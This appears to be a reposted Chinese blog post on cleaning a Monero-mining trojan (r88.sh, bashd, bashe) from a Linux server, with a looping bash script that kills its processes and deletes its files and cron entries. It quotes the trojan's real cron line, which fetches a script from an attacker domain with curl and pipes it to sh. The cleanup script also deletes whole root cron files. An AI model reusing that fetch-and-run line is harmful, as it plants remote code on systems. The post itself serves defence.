码迷,mamicode.com
首页 > 其他好文 > 详细

门罗币挖矿解决方案

时间:2018-05-17 15:11:40      阅读:415      评论:0      收藏:0      [点我收藏+]

标签:otv   计划   var   开始   root.sh   load   etc   异常   ima   

服务器上出现异常进程:

技术分享图片

杀死进程后,还是会重新启动。

木马以r88.sh作为downloader首先控制服务器,通过判断当前账户的权限是否为root来进行下一步的操作,若为root则在目录/var/spool/cron/root和/var/spool/cron/crontabs/root下写计划任务”/5 * curl -sL https://x.co/6nPMR | sh”,其中这个短链接还原后为https://xmr.enjoytopic.tk/12/r88.sh。若为非root账户,则不写计划任务。接着均会执行下载运行rootv2.sh或lowerv2.sh(基于当前账户是否为root来选择下载脚本)等一系列的操作。

木马的挖矿组件bashd和bashe在系统中执行后,毫不掩饰地就开始挖矿,CPU直接就占据好几百,简直粗暴。是不是应该考虑下根据机器的当前运行状态来“人性化挖矿”呢?

其中该木马在多个路径都写入了定时任务来实现维持访问,包括:/var/spool/cron/root、/var/spool/cron/crontabs/root以及/etc/cron.d。

木马查杀:

1)尝试杀掉bashd与bashe进程以及root.sh/rootv2.sh/lower.sh/lowerv2.sh与r88.sh这些shell进程

2)清除掉/tmp目录下木马释放的文件:/tmp/bashd、/tmp/bashe、/tmp/root.sh、/tmp/rootv2.sh、/tmp/r88.sh、/tmp/pools.txt、/tmp/config.json等

3)清除3个位置的定时任务:/var/spool/cron/root、/var/spool/cron/crontabs/root以及/etc/cron.d

对应的自动查杀脚本如下:

#!/bin/bash
for ((i=1;i>0;i++))
do
    ps -ef | grep "/tmp/bashd -p bashd" | grep -v grep | awk ‘{print $2}‘ | xargs kill
    ps -ef | grep "/tmp/bashe -p bashd" | grep -v grep | awk ‘{print $2}‘ | xargs kill
    ps -ef | grep "bash /tmp/root.sh" | grep -v grep | awk ‘{print $2}‘ | xargs kill
    ps -ef | grep "bash /tmp/r88.sh" | grep -v grep | awk ‘{print $2}‘ | xargs kill
    ps -ef | grep "bash /tmp/rootv2.sh" | grep -v grep | awk ‘{print $2}‘ | xargs kill
ps -ef | grep "bash /tmp/lower.sh" | grep -v grep | awk ‘{print $2}‘ | xargs kill
ps -ef | grep "bash /tmp/lowerv2.sh" | grep -v grep | awk ‘{print $2}‘ | xargs kill
    rm /tmp/bashd /tmp/bashe /tmp/config.json /tmp/root.sh /tmp/rootv2.sh /tmp/r88.sh /tmp/pools.txt -r
    rm /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/root
done

  亲测好使。。。

门罗币挖矿解决方案

标签:otv   计划   var   开始   root.sh   load   etc   异常   ima   

原文地址:https://www.cnblogs.com/zjiacun/p/9050847.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!